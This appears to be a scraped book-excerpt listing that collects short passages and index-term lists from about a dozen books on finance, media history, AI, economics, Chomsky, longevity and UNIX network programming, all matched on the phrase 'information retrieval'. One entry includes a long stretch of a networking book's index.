Andy Kessler, barriers to entry, Berlin Wall, Big bang: deregulation of the City of London, Bonfire of the Vanities, business cycle, buttonwood tree, buy and hold, capital asset pricing model, commoditize, corporate governance, corporate raider, crony capitalism, cross-subsidies, financial deregulation, financial innovation, fixed income, Gordon Gekko, high net worth, information retrieval, interest rate derivative, invisible hand, John Meriwether, Long Term Capital Management, Martin Wolf, new economy, Nick Leeson, offshore financial centre, pensions crisis, regulatory arbitrage, Sand Hill Road, shareholder value, short selling, Silicon Valley, South Sea Bubble, statistical model, Telecommunications Act of 1996, The Chicago School, The Predators' Ball, The Wealth of Nations by Adam Smith, transaction costs, tulip mania, value at risk, yield curve

These institutions manage the pooled assets of millions of savers, policy holders, pensioners and workers investing for retirement. They range in size from top firms like UBS, Fidelity, State Street, and Barclays Global Investors, which manage over a trillion dollars apiece, to small hedge funds looking after a few million dollars. They rely heavily on brokers whose job is to provide them with advice, information and share dealing: ‘Our best brokers have a great appetite for information retrieval and dissemination. We get our first Bloomberg messages at 5.20 a.m., it’s an information game. We pay brokers $60 million of commission out of a $3 billion fund and most goes to those that phone us most often. They are fast ten-second conversations, often Bloomberg driven. I get a thousand e-mails a day and I read them all.’7 The broking divisions of the top investment banks flood their clients with information: ‘We give them a view on every single price movement; it’s all about short term momentum.


Paper Knowledge: Toward a Media History of Documents by Lisa Gitelman

Andrew Keen, computer age, corporate governance, deskilling, Douglas Engelbart, East Village, en.wikipedia.org, information retrieval, Internet Archive, invention of movable type, Jaron Lanier, knowledge economy, Marshall McLuhan, Mikhail Gorbachev, national security letter, On the Economy of Machinery and Manufactures, optical character recognition, profit motive, QR code, RAND corporation, RFC: Request For Comment, Shoshana Zuboff, Silicon Valley, Steve Jobs, The Structural Transformation of the Public Sphere, Turing test, WikiLeaks, Works Progress Administration

Even his text was drawn, in the sense that the text display program used to put legends on drawings built characters “by means of special tables which indicate the locations of line and circle segments to make up the letters and numbers”—a process that, in a sense, looked forward to PostScript, TrueType, and pdf. Characters were typed in, but then they were generated graphically by the system for display on screen. Both microform databanks and Sutherland’s Sketchpad gesture selectively toward a prehistory for the pdf page image because both—though differently—mobilized pages and images of pages for a screen-based interface. The databanks retrieved televisual reproductions of existing source pages, modeling not just information retrieval but also encouraging certain citation norms (since users could indicate that, for example, “the information appears on page 10”). Meanwhile, Sketchpad established a page as a fixed computational field, a visible ground on which further computational objects might be rendered. The portable document format is related more tenuously to mainframes and microform, even though today’s reference databases—the majority of which of course include and serve up pdf—clearly descend in some measure from experiments like Intrex and the Times Information Bank.


pages: 339 words: 94,769

Possible Minds: Twenty-Five Ways of Looking at AI by John Brockman

AI winter, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, artificial general intelligence, Asilomar, autonomous vehicles, basic income, Benoit Mandelbrot, Bill Joy: nanobots, Buckminster Fuller, cellular automata, Claude Shannon: information theory, Daniel Kahneman / Amos Tversky, Danny Hillis, David Graeber, easy for humans, difficult for computers, Elon Musk, Eratosthenes, Ernest Rutherford, finite state, friendly AI, future of work, Geoffrey West, Santa Fe Institute, gig economy, income inequality, industrial robot, information retrieval, invention of writing, James Watt: steam engine, Johannes Kepler, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, Kevin Kelly, Kickstarter, Laplace demon, Loebner Prize, market fundamentalism, Marshall McLuhan, Menlo Park, Norbert Wiener, optical character recognition, pattern recognition, personalized medicine, Picturephone, profit maximization, profit motive, RAND corporation, random walk, Ray Kurzweil, Richard Feynman, Rodney Brooks, self-driving car, sexual politics, Silicon Valley, Skype, social graph, speech recognition, statistical model, Stephen Hawking, Steven Pinker, Stewart Brand, strong AI, superintelligent machines, supervolcano, technological singularity, technoutopianism, telemarketer, telerobotics, the scientific method, theory of mind, Turing machine, Turing test, universal basic income, Upton Sinclair, Von Neumann architecture, Whole Earth Catalog, Y2K, zero-sum game

, used 85,000 watts real time, while the human brains were using 20 watts each. To be fair, the human body needs 100 watts to operate and twenty years to build, hence about 6 trillion joules of energy to “manufacture” a mature human brain. The cost of manufacturing Watson-scale computing is similar. So why aren’t humans displacing computers? For one, the Jeopardy! contestants’ brains were doing far more than information retrieval—much of which would be considered mere distractions by Watson (e.g., cerebellar control of smiling). Other parts allow leaping out of the box with transcendence unfathomable by Watson, such as what we see in Einstein’s five annus mirabilis papers of 1905. Also, humans consume more energy than the minimum (100 watts) required for life and reproduction. People in India use an average of 700 watts per person; it’s 10,000 watts in the U.S.


pages: 382 words: 92,138

The Entrepreneurial State: Debunking Public vs. Private Sector Myths by Mariana Mazzucato

"Robert Solow", Apple II, banking crisis, barriers to entry, Bretton Woods, business cycle, California gold rush, call centre, carbon footprint, Carmen Reinhart, cleantech, computer age, creative destruction, credit crunch, David Ricardo: comparative advantage, demand response, deskilling, endogenous growth, energy security, energy transition, eurozone crisis, everywhere but in the productivity statistics, Financial Instability Hypothesis, full employment, G4S, Growth in a Time of Debt, Hyman Minsky, incomplete markets, information retrieval, intangible asset, invisible hand, Joseph Schumpeter, Kenneth Rogoff, Kickstarter, knowledge economy, knowledge worker, natural language processing, new economy, offshore financial centre, Philip Mirowski, popular electronics, profit maximization, Ralph Nader, renewable energy credits, rent-seeking, ride hailing / ride sharing, risk tolerance, shareholder value, Silicon Valley, Silicon Valley ideology, smart grid, Steve Jobs, Steve Wozniak, The Wealth of Nations by Adam Smith, Tim Cook: Apple, too big to fail, total factor productivity, trickle-down economics, Washington Consensus, William Shockley: the traitorous eight

Available online at http://www.guardian.co.uk/technology/2002/apr/04/internetnews.maths/print (accessed 10 October 2012). DIUS (Department of Innovation, Universities and Skills). 2008. Innovation Nation, March. Cm 7345. London: DIUS. DoD (United States Department of Defense). 2011. Selected Acquisition Report (SAR): RCS: DD-A&T(Q&A)823-166 : NAVSTAR GPS: Defense Acquisition Management Information Retrieval (DAMIR). Los Angeles, 31 December. DoE (United States Department of Energy). 2007. ‘DOE-Supported Researcher Is Co-winner of 2007 Nobel Prize in Physics’. 10 September. Available online at http://science.energy.gov/news/in-the-news/2007/10-09-07/?p=1 (accessed 21 January 2013). _____. 2009. ‘DOE Awards $377 Million in Funding for 46 Energy Frontier Research Centers’. Energy.gov, 6 August.


Noam Chomsky: A Life of Dissent by Robert F. Barsky

Albert Einstein, anti-communist, centre right, feminist movement, Howard Zinn, information retrieval, means of production, Norman Mailer, profit motive, Ralph Nader, Ronald Reagan, strong AI, The Bell Curve by Richard Herrnstein and Charles Murray, theory of mind, Yom Kippur War

Harris 83) Zellig Harris, Chomsky recalls, "had this idea of trying to do something new by looking at the structure of discourse. He tried to use the features of linguistic analysis for discourse analysis" (qtd. in R. A. Harris 83). From this project discourse analysis was born. Chomsky was in search of transformations "to model the linguistic knowledge in a native speaker's head," while Harris was interested in "such practical purposes as machine translation and automated information retrieval" (R. A. Harris 84). Their linguistic interests were irrevocably diverging. Chomsky's last communications with Harris were in the early 1960s, "when [Harris] asked me to [approach] contacts at the [National Science Foundation] for a research contract for him, which I did. We then spent a couple of days together in Israel, in 1964. After that, there was no contact. No falling out, just a mutual understanding, better left unsaid" (23 June 1994).


pages: 344 words: 94,332

The 100-Year Life: Living and Working in an Age of Longevity by Lynda Gratton, Andrew Scott

3D printing, Airbnb, assortative mating, carbon footprint, Clayton Christensen, collapse of Lehman Brothers, creative destruction, crowdsourcing, delayed gratification, disruptive innovation, diversification, Downton Abbey, Erik Brynjolfsson, falling living standards, financial independence, first square of the chessboard / second half of the chessboard, future of work, gender pay gap, gig economy, Google Glasses, indoor plumbing, information retrieval, intangible asset, Isaac Newton, job satisfaction, longitudinal study, low skilled workers, Lyft, Nelson Mandela, Network effects, New Economic Geography, old age dependency ratio, pattern recognition, pension reform, Peter Thiel, Ray Kurzweil, Richard Florida, Richard Thaler, Second Machine Age, sharing economy, side project, Silicon Valley, smart cities, Stanford marshmallow experiment, Stephen Hawking, Steve Jobs, The Future of Employment, uber lyft, women in the workforce, young professional

Indeed this is already happening at the authors’ own institution of London Business School, where there is an ever-increasing emphasis on the part of both students and firms on ideas and innovation, creativity and entrepreneurship. Aligned to this is the growing importance of human skills and judgement. There are those who argue that even these skills can be performed by AI – pointing, for example, to the development of IBM’s supercomputer Watson, which is able to perform detailed oncological diagnosis. This means that with diagnostic augmentation, the skill set for the medical profession will shift from information retrieval to deeper intuitive experience, more person-to-person skills and greater emphasis on team motivation and judgement. The same technological developments will occur in the education sector, where digital teaching will replace textbooks and classroom teaching and the valuable skills will move towards the intricate human skills of empathy, motivation and encouragement. Across a long productive life there will be an increasing focus on general portable skills and capabilities such as mental flexibility and agility.


UNIX® Network Programming, Volume 1: The Sockets Networking API, 3rd Edition by W. Richard Stevens, Bill Fenner, Andrew M. Rudoff

failed state, fudge factor, information retrieval, p-value, RFC: Request For Comment, Richard Stallman, web application

Common alternatives are static host files (normally the file /etc/hosts, as we describe in Figure 11.21), the Network Information System (NIS) or Lightweight Directory Access Protocol (LDAP). Unfortunately, it is implementation-dependent how an administrator configures a host to use the different types of name services. Solaris 2.x, HP-UX 10 and later, and FreeBSD 5.x and later use the file /etc/nsswitch.conf, and AIX uses the file /etc/netsvc.conf. BIND 9.2.2 supplies its own version named the Information Retrieval Service (IRS), which uses the file /etc/irs.conf. If a name server is to be used for hostname lookups, then all these systems use the file /etc/resolv.conf to specify the IP addresses of the name servers. Fortunately, these differences are normally hidden to the application programmer, so we just call the resolver functions such as gethostbyname and gethostbyaddr. Host computers are normally known by human-readable names.

Index entries: Information Retrieval Service, see IRS; IRS (Information Retrieval Service), 306.
query, 884 multicast listener report, 884 Index 965 neighbor advertisement, 884 neighbor advertisement, inverse, 884 neighbor solicitation, 884 neighbor solicitation, inverse, 884 socket option, 216 type filtering, 740 – 741 id program, 431 ident member, 405 identification field, IPv4, 870 IEC (International Electrotechnical Commission), 26, 950 IEEE (Institute of Electrical and Electronics Engineers), 26, 509, 550, 879, 950 IEEE-IX, 26 IETF (Internet Engineering Task Force), 28, 947 if_announcemsghdr structure, 487 definition of, 488 if_freenameindex function, 504 – 508 definition of, 504 source code, 508 if_index member, 504, 903 if_indextoname function, 504 – 508, 566, 568, 593 definition of, 504 source code, 506 if_msghdr structure, 487, 502 definition of, 488 if_name member, 504, 508, 903 if_nameindex function, 486, 504 – 508 definition of, 504 source code, 507 if_nameindex structure, 504, 507 – 508, 903 definition of, 504 if_nametoindex function, 486, 504 – 508, 566 – 567, 569 definition of, 504 source code, 505 ifa_msghdr structure, 487 definition of, 488 ifam_addrs member, 489, 493 ifc_buf member, 469 – 470 ifc_len member, 77, 468, 470 ifc_req member, 469 ifconf structure, 77, 467 – 468, 470 definition of, 469 ifconfig program, 23, 25, 103, 234, 471, 480 IFF_BROADCAST constant, 480 IFF_POINTOPOINT constant, 480 IFF_PROMISC constant, 792 IFF_UP constant, 480 ifi_hlen member, 473, 478, 502 ifi_index member, 502 ifi_info structure, 469, 471, 473, 475, 478, 484, 500, 502, 608 ifi_next member, 471, 478 ifm_addrs member, 489, 493 966 UNIX Network Programming ifm_type member, 502 ifma_msghdr structure, 487 definition of, 488 ifmam_addrs member, 489 IFNAMSIZ constant, 504 ifr_addr member, 469, 480 – 481 ifr_broadaddr member, 469, 481, 484 ifr_data member, 469 ifr_dstaddr member, 469, 481, 484 ifr_flags member, 469, 480 – 481 ifr_metric member, 469, 481 ifr_name member, 470, 480 ifreq structure, 467 – 468, 470, 475, 477, 480, 484, 568 definition of, 469 IFT_NONE 
constant, 591 IGMP (Internet Group Management Protocol), 33 – 34, 556, 735, 739 – 740, 871 checksum, 753 ILP32, programming model, 28 imperfect multicast filtering, 555 implementation ICMP message daemon, 769 – 786 ping program, 741 – 754 traceroute program, 755 – 768 imr_interface member, 560, 562, 568 imr_multiaddr member, 560, 562 imr_sourceaddr member, 562 IN6_IS_ADDR_LINKLOCAL macro, definition of, 360 IN6_IS_ADDR_LOOPBACK macro, definition of, 360 IN6_IS_ADDR_MC_GLOBAL macro, definition of, 360 IN6_IS_ADDR_MC_LINKLOCAL macro, definition of, 360 IN6_IS_ADDR_MC_NODELOCAL macro, definition of, 360 IN6_IS_ADDR_MC_ORGLOCAL macro, definition of, 360 IN6_IS_ADDR_MC_SITELOCAL macro, definition of, 360 IN6_IS_ADDR_MULTICAST macro, definition of, 360 IN6_IS_ADDR_SITELOCAL macro, definition of, 360 IN6_IS_ADDR_UNSPECIFIED macro, definition of, 360 IN6_IS_ADDR_V4COMPAT macro, definition of, 360 IN6_IS_ADDR_V4MAPPED macro, 355, 360, 362, 745 definition of, 360 in6_addr structure, 193, 561 definition of, 71 in6_pktinfo structure, 588, 615 – 617, 731 Index definition of, 616 IN6ADDR_ANY_INIT constant, 103, 320, 322, 412, 616, 881 IN6ADDR_LOOPBACK_INIT constant, 880 in6addr_any constant, 103, 881 in6addr_loopback constant, 880 in_addr structure, 70, 193, 308, 310, 358, 560, 563 definition of, 68 in_addr_t datatype, 69 – 70 in_cksum function, 753 source code, 753 in_pcbdetach function, 140 in_port_t datatype, 69 INADDR_ANY constant, 13, 53, 102 – 103, 122, 126, 214, 242, 288, 320, 322, 412, 534, 560 – 563, 859, 876, 915 INADDR_LOOPBACK constant, 876 INADDR_MAX_LOCAL_GROUP constant, 915 INADDR_NONE constant, 82, 901, 915 in-addr.arpa domain, 304, 310 in-band data, 645 incarnation, definition of, 44 incomplete connection queue, 104 index, interface, 217, 489, 498, 502, 504 – 508, 560 – 563, 566, 569, 577, 616, 731 INET6_ADDRSTRLEN constant, 83, 86, 901 inet6_opt_append function, 723 – 724 definition of, 723 inet6_opt_find function, 725 definition of, 724 inet6_opt_finish 
function, 723 – 724 definition of, 723 inet6_opt_get_val function, 725 definition of, 724 inet6_opt_init function, 723 – 724 definition of, 723 inet6_option_alloc function, 732 inet6_option_append function, 732 inet6_option_find function, 732 inet6_option_init function, 732 inet6_option_next function, 732 inet6_option_space function, 732 inet6_opt_next function, 724 – 725 definition of, 724 inet6_opt_set_val function, 723 – 725 definition of, 723 inet6_rth_add function, 727 – 728 definition of, 727 inet6_rthdr_add function, 732 inet6_rthdr_getaddr function, 732 inet6_rthdr_getflags function, 732 inet6_rthdr_init function, 732 inet6_rthdr_lasthop function, 732 inet6_rthdr_reverse function, 732 inet6_rthdr_segments function, 732 inet6_rthdr_space function, 732 UNIX Network Programming inet6_rth_getaddr function, 728, 731 definition of, 728 inet6_rth_init function, 727 – 728 definition of, 727 inet6_rth_reverse function, 728, 730 definition of, 728 inet6_rth_segments function, 728, 731 definition of, 728 inet6_rth_space function, 727 – 728 definition of, 727 inet6_srcrt_print function, 730 – 731 INET_ADDRSTRLEN constant, 83, 86, 901 inet_addr function, 9, 67, 82 – 83, 93 definition of, 82 inet_aton function, 82 – 83, 93, 314 definition of, 82 inet_ntoa function, 67, 82 – 83, 343, 685 definition of, 82 inet_ntop function, 67, 82 – 86, 93, 110, 309, 341, 343, 345, 350, 593, 731 definition of, 83 IPv4-only version, source code, 85 inet_pton function, 8 – 9, 11, 67, 82 – 85, 93, 290, 333, 343, 930 definition of, 83 IPv4-only version, source code, 85 inet_pton_loose function, 93 inet_srcrt_add function, 713, 715 inet_srcrt_init function, 712, 715 inet_srcrt_print function, 714 inetd program, 61, 114, 118 – 119, 154, 363, 371 – 380, 587, 613 – 614, 825, 850, 897, 934, 945 Information Retrieval Service, see IRS INFTIM constant, 184, 902 init program, 132, 145, 938 init_v6 function, 749 initial thread, 676 in.rdisc program, 735 Institute of Electrical and Electronics 
Engineers, see IEEE int16_t datatype, 69 int32_t datatype, 69 int8_t datatype, 69 interface address, UDP, binding, 608 – 612 configuration, ioctl function, 468 – 469 index, 217, 489, 498, 502, 504 – 508, 560 – 563, 566, 569, 577, 616, 731 index, recvmsg function, receiving, 588 – 593 logical, 877 loopback, 23, 792, 799, 809, 876 – 877 message-based, 858 operations, ioctl function, 480 – 481 UDP determining outgoing, 261 – 262 interface-local multicast scope, 552 – 553 International Electrotechnical Commission, see IEC Index 967 International Organization for Standardization, see ISO Internet, 5, 22 Internet Assigned Numbers Authority, see IANA Internet Control Message Protocol, see ICMP Internet Control Message Protocol version 4, see ICMPv4 Internet Control Message Protocol version 6, see ICMPv6 Internet Draft, 947 Internet Engineering Task Force, see IETF Internet Group Management Protocol, see IGMP Internet Protocol, see IP Internet Protocol next generation, see IPng Internet Protocol version 4, see IPv4 Internet Protocol version 6, see IPv6 Internet service provider, see ISP Internetwork Packet Exchange, see IPX interoperability IPv4 and IPv6, 353 – 362 IPv4 client IPv6 server, 354 – 357 IPv6 client IPv4 server, 357 – 359 source code portability, 361 interprocess communication, see IPC interrupts, software, 129 inverse, ICMPv6 neighbor advertisement, 884 ICMPv6 neighbor solicitation, 884 I/O asynchronous, 160, 468, 663 definition of, Unix, 399 model, asynchronous, 158 – 159 model, blocking, 154 – 155 model, comparison of, 159 – 160 model, I/O, multiplexing, 156 – 157 model, nonblocking, 155 – 156 model, signal-driven, 157 – 158 models, 154 – 160 multiplexing, 153 – 189 multiplexing I/O, model, 156 – 157 nonblocking, 88, 165, 234 – 235, 388, 398, 435 – 464, 468, 665, 669, 671, 919, 945 signal-driven, 200, 234 – 235, 663 – 673 standard, 168, 344, 399 – 402, 409, 437, 935, 952 synchronous, 160 ioctl function, 191, 222, 233 – 234, 399, 403 – 404, 409, 420, 465 – 
469, 474 – 475, 477 – 478, 480 – 485, 500, 538, 566, 568, 585, 647, 654, 664, 666, 669, 790, 792, 799, 852, 857, 868 ARP cache operations, 481 – 483 definition of, 466, 857 file operations, 468 interface configuration, 468 – 469 interface operations, 480 – 481 routing table operations, 483 – 484 socket operations, 466 – 467 STREAMS, 857 – 858 968 UNIX Network Programming IOV_MAX constant, 390 iov_base member, 389 iov_len member, 389, 392 iovec structure, 389 – 391, 393, 601 definition of, 389 IP (Internet Protocol), 33 fragmentation and broadcast, 537 – 538 fragmentation and multicast, 571 Multicast Infrastructure, 571, 584 – 585 Multicast Infrastructure session announcements, 571 – 575 routing, 869 spoofing, 108, 948 version number field, 869, 871 ip6_mtuinfo structure, definition of, 619 ip6.arpa domain, 304 ip6m_addr member, 619 ip6m_mtu member, 619 IP_ADD_MEMBERSHIP socket option, 193, 560, 562 IP_ADD_SOURCE_MEMBERSHIP socket option, 193, 560 IP_BLOCK_SOURCE socket option, 193, 560, 562 IP_DROP_MEMBERSHIP socket option, 193, 560 – 561 IP_DROP_SOURCE_MEMBERSHIP socket option, 193, 560 IP_HDRINCL socket option, 193, 214, 710, 736 – 738, 753, 755, 790, 793, 805 – 806 IP_MULTICAST_IF socket option, 193, 559, 563, 945 IP_MULTICAST_LOOP socket option, 193, 559, 563 IP_MULTICAST_TTL socket option, 193, 215, 559, 563, 871, 945 IP_OPTIONS socket option, 193, 214, 709 – 710, 718, 733, 945 IP_RECVDSTADDR socket option, 193, 211, 214, 251, 265, 392 – 396, 587 – 588, 590, 592, 608, 616, 620, 666, 895 ancillary data, picture of, 394 IP_RECVIF socket option, 193, 215, 395, 487, 588, 590, 592, 608, 620, 666 ancillary data, picture of, 591 IP_TOS socket option, 193, 215, 870, 895 IP_TTL socket option, 193, 215, 218, 755, 761, 871, 895 IP_UNBLOCK_SOURCE socket option, 193, 560 ip_id member, 740, 806 ip_len member, 737, 740, 806 ip_mreq structure, 193, 560, 568 definition of, 560 ip_mreq_source structure, 193 definition of, 562 ip_off member, 737, 740 IPC (interprocess 
communication), 411 – 412, Index 545 – 547, 675 ipi6_addr member, 616 ipi6_ifindex member, 616 ipi_addr member, 588, 901 ipi_ifindex member, 588, 901 IPng (Internet Protocol next generation), 871 ipopt_dst member, 714 ipopt_list member, 714 ipoption structure, definition of, 714 IPPROTO_ICMP constant, 736 IPPROTO_ICMPV6 constant, 193, 216, 738, 740 IPPROTO_IP constant, 214, 394 – 395, 591, 710 IPPROTO_IPV6 constant, 216, 395, 615 – 619, 722, 727 IPPROTO_RAW constant, 737 IPPROTO_SCTP constant, 97, 222, 288 IPPROTO_TCP constant, 97, 219, 288, 519 IPPROTO_UDP constant, 97 IPsec, 951 IPv4 (Internet Protocol version 4), 33, 869 address, 874 – 877 and IPv6 interoperability, 353 – 362 checksum, 214, 737, 753, 871 client IPv6 server, interoperability, 354 – 357 destination address, 871 fragment offset field, 871 header, 743, 755, 869 – 871 header length field, 870 header, picture of, 870 identification field, 870 multicast address, 549 – 551 multicast address, ethernet mapping, picture of, 550 options, 214, 709 – 711, 871 protocol field, 871 receiving packet information, 588 – 593 server, interoperability, IPv6 client, 357 – 359 socket address structure, 68 – 70 socket option, 214 – 215 source address, 871 source routing, 711 – 719 total length field, 870 IPv4-compatible IPv6 address, 880 IPv4/IPv6 host, definition of, 34 IPv4-mapped IPv6 address, 93, 322, 333, 354 – 360, 745, 879 – 880 IPv6 (Internet Protocol version 6), xx, 33, 871 address, 877 – 881 backbone, see 6bone checksum, 216, 738, 873 client IPv4 server, interoperability, 357 – 359 destination address, 873 destination options, 719 – 725 extension headers, 719 flow label field, 871 getaddrinfo function, 322 – 323 UNIX Network Programming header, 744, 755, 871 – 874 header, picture of, 872 historical advanced API, 732 hop-by-hop options, 719 – 725 interoperability, IPv4 and, 353 – 362 multicast address, 551 – 552 multicast address, ethernet mapping, picture of, 550 multicast address, picture of, 551 next header 
field, 872 options, see IPv6, extension headers path MTU control, 618 – 619 payload length field, 872 receiving packet information, 615 – 618 routing header, 725 – 731 server, interoperability, IPv4 client, 354 – 357 socket address structure, 71 – 72 socket option, 216 – 218 source address, 873 source routing, 725 – 731 source routing segments left, 725 source routing type, 725 sticky options, 731 – 732 IPV6_ADD_MEMBERSHIP socket option, 560 – 561 IPV6_ADDRFORM socket option, 361 IPV6_CHECKSUM socket option, 193, 216, 738 IPV6_DONTFRAG socket option, 216, 619 IPV6_DROP_MEMBERSHIP socket option, 560 – 561 IPV6_DSTOPTS socket option, 193, 395, 732 ancillary data, picture of, 722 IPV6_HOPLIMIT socket option, 193, 395, 617, 732, 749 – 750, 873 ancillary data, picture of, 615 IPV6_HOPOPTS socket option, 193, 395, 732 ancillary data, picture of, 722 IPV6_JOIN_GROUP socket option, 193, 560, 562 IPV6_LEAVE_GROUP socket option, 193, 561 IPV6_MULTICAST_HOPS socket option, 193, 559, 563, 617, 873 IPV6_MULTICAST_IF socket option, 193, 559, 563, 616 IPV6_MULTICAST_LOOP socket option, 193, 559, 563 IPV6_NEXTHOP socket option, 193, 217, 395, 617, 732 ancillary data, picture of, 615 IPV6_PATHMTU socket option, 217, 619 IPV6_PKTINFO socket option, 193, 251, 395, 561, 608, 616, 620, 666, 732 ancillary data, picture of, 615 IPV6_PKTOPTIONS socket option, 732 IPV6_RECVDSTOPTS socket option, 217, 722 IPV6_RECVHOPLIMIT socket option, 217 – 218, 617, 749, 873 IPV6_RECVHOPOPTS socket option, 217, 722 Index 969 IPV6_RECVPATHMTU socket option, 216 – 217, 619 IPV6_RECVPKTINFO socket option, 217, 616 – 617, 620 IPV6_RECVRTHDR socket option, 218, 727, 729 IPV6_RECVTCLASS socket option, 218, 618 IPV6_RTHDR socket option, 193, 395, 732 ancillary data, picture of, 727 IPV6_RTHDR_TYPE_0 constant, 727 IPV6_TCLASS socket option, 395, 618, 732, 871 ancillary data, picture of, 615 IPV6_UNICAST_HOPS socket option, 193, 218, 617, 755, 761, 873 IPV6_USE_MIN_MTU socket option, 218, 618 – 619 IPV6_V6ONLY 
socket option, 218, 357 IPV6_XXX socket options, 218 ipv6_mreq structure, 193, 560, 569 definition of, 560 ipv6mr_interface member, 560, 569 ipv6mr_multiaddr member, 560 IPX (Internetwork Packet Exchange), 952 IRS (Information Retrieval Service), 306 ISO (International Organization for Standardization), 18, 26, 950 ISO 8859, 573 ISP (Internet service provider), 875 iterative server, 15, 114, 243, 821 – 822 Jackson, A., 721, 952 Jacobson, V., 35, 38 – 39, 44, 571, 596, 598 – 599, 737, 788, 790, 896, 949 – 951 Jim, J., 285, 953 Jinmei, T., 28, 216, 397, 719, 738, 744, 953 joinable thread, 678 Jones, R. A., xxii–xxiii Josey, A., 25, 27, 950 Joy, W.
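The index entries above catalog the IPv4 multicast socket options (IP_ADD_MEMBERSHIP, IP_MULTICAST_TTL, and their IPv6 counterparts). As a minimal sketch of how they fit together, this hypothetical Python receiver joins an IPv4 multicast group; the group address and port are illustrative, and the join is wrapped in a try/except because it fails on hosts with no multicast-capable interface:

```python
import socket
import struct

# Hypothetical group and port, for illustration only.
GROUP, PORT = "224.1.1.1", 5007

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", PORT))

# ip_mreq: 4-byte group address followed by 4-byte local
# interface address (0.0.0.0 = INADDR_ANY lets the kernel choose).
mreq = struct.pack("4s4s", socket.inet_aton(GROUP),
                   socket.inet_aton("0.0.0.0"))
try:
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
except OSError:
    pass  # no multicast-capable interface available

# Keep outgoing multicast datagrams on the local network (TTL = 1).
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
```

The same pattern carries over to IPv6 with IPV6_JOIN_GROUP and an ipv6_mreq built from the group address plus an interface index.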


How to Form Your Own California Corporation by Anthony Mancuso

business cycle, corporate governance, corporate raider, distributed generation, estate planning, information retrieval, intangible asset, passive income, passive investing, Silicon Valley

If not, use the form provided on the website. California Secretary of State contact Information www.ss.ca.gov/business/corp/corporate.htm Office hours for all locations are Monday through Friday 8:00 a.m. to 5:00 p.m. Sacramento Office 1500 11th Street Sacramento, CA 95814 (916) 657-5448* • Name Availability Unit (*recorded information on how to obtain) • Document Filing Support Unit • Legal Review Unit • Information Retrieval and Certification Unit • Status (*recorded information on how to obtain) • Statement of Information Unit (filings only) P.O. Box 944230 Sacramento, CA 94244-2300 • Substituted Service of Process (must be hand delivered to the Sacramento office) San Francisco Regional Office 455 Golden Gate Avenue, Suite 14500 San Francisco, CA 94102-7007 415-557-8000 Fresno Regional Office 1315 Van Ness Ave., Suite 203 Fresno, CA 93721-1729 559-445-6900 Los Angeles Regional Office 300 South Spring Street, Room 12513 Los Angeles, CA 90013-1233 213-897-3062 San Diego Regional Office 1350 Front Street, Suite 2060 San Diego, CA 92101-3609 619-525-4113 California Department of Corporations contact information www.corp.ca.gov Contact Information The Department of Corporations, the office that receives your Notice of Stock Issuance, as explained in Chapter 5, Step 7, has four offices.


pages: 386 words: 91,913

The Elements of Power: Gadgets, Guns, and the Struggle for a Sustainable Future in the Rare Metal Age by David S. Abraham

3D printing, Airbus A320, carbon footprint, clean water, cleantech, commoditize, Deng Xiaoping, Elon Musk, en.wikipedia.org, glass ceiling, global supply chain, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Internet of things, new economy, oil shale / tar sands, oil shock, reshoring, Robert Metcalfe, Ronald Reagan, Silicon Valley, South China Sea, Steve Ballmer, Steve Jobs, telemarketer, Tesla Model S, thinkpad, upwardly mobile, uranium enrichment, WikiLeaks, Y2K

The weights of rare earth materials included in the congressional committee report likely include a substantial weight portion from other metals as well. Ronald H. O’Rourke, “Navy Virginia (SSN-774) Class Attack Submarine Procurement: Background and Issues for Congress,” Congressional Research Service, July 31, 2014, http://www.fas.org/sgp/crs/weapons/RL32418.pdf. For information on Virginia class submarine purchases, see, “DDG 51 Arleigh Burke Class Guided Missile Destroyer,” Defense Acquisition Management Information Retrieval, December 31, 2012, accessed December 18, 2014, http://www.dod.mil/pubs/foi/logistics_material_readiness/acq_bud_fin/SARs/2012-sars/13-F-0884_SARs_as_of_Dec_2012/Navy/DDG_51_December_2012_SAR.pdf. For information on the DDG 51 Aegis Destroyer Ships as of 2012, including expected production until 2016, see “Next Global Positioning System Receiver Equipment,” Committee Reports 113th Congress (2013–2014), House Report 113-102, June 7, 2013, accessed December 18, 2014, thomas.loc.gov/cgi-bin/cpquery/?


pages: 443 words: 98,113

The Corruption of Capitalism: Why Rentiers Thrive and Work Does Not Pay by Guy Standing

3D printing, Airbnb, Albert Einstein, Amazon Mechanical Turk, Asian financial crisis, asset-backed security, bank run, banking crisis, basic income, Ben Bernanke: helicopter money, Bernie Sanders, Big bang: deregulation of the City of London, bilateral investment treaty, Bonfire of the Vanities, Boris Johnson, Bretton Woods, business cycle, Capital in the Twenty-First Century by Thomas Piketty, carried interest, cashless society, central bank independence, centre right, Clayton Christensen, collapse of Lehman Brothers, collective bargaining, credit crunch, crony capitalism, crowdsourcing, debt deflation, declining real wages, deindustrialization, disruptive innovation, Doha Development Round, Donald Trump, Double Irish / Dutch Sandwich, ending welfare as we know it, eurozone crisis, falling living standards, financial deregulation, financial innovation, Firefox, first-past-the-post, future of work, gig economy, Goldman Sachs: Vampire Squid, Growth in a Time of Debt, housing crisis, income inequality, information retrieval, intangible asset, invention of the steam engine, investor state dispute settlement, James Watt: steam engine, job automation, John Maynard Keynes: technological unemployment, labour market flexibility, light touch regulation, Long Term Capital Management, lump of labour, Lyft, manufacturing employment, Mark Zuckerberg, market clearing, Martin Wolf, means of production, mini-job, Mont Pelerin Society, moral hazard, mortgage debt, mortgage tax deduction, Neil Kinnock, non-tariff barriers, North Sea oil, Northern Rock, nudge unit, Occupy movement, offshore financial centre, oil shale / tar sands, open economy, openstreetmap, patent troll, payday loans, peer-to-peer lending, plutocrats, Plutocrats, Ponzi scheme, precariat, quantitative easing, remote working, rent control, rent-seeking, ride hailing / ride sharing, Right to Buy, Robert Gordon, Ronald Coase, Ronald Reagan, Sam Altman, savings glut, Second Machine Age, secular stagnation, sharing 
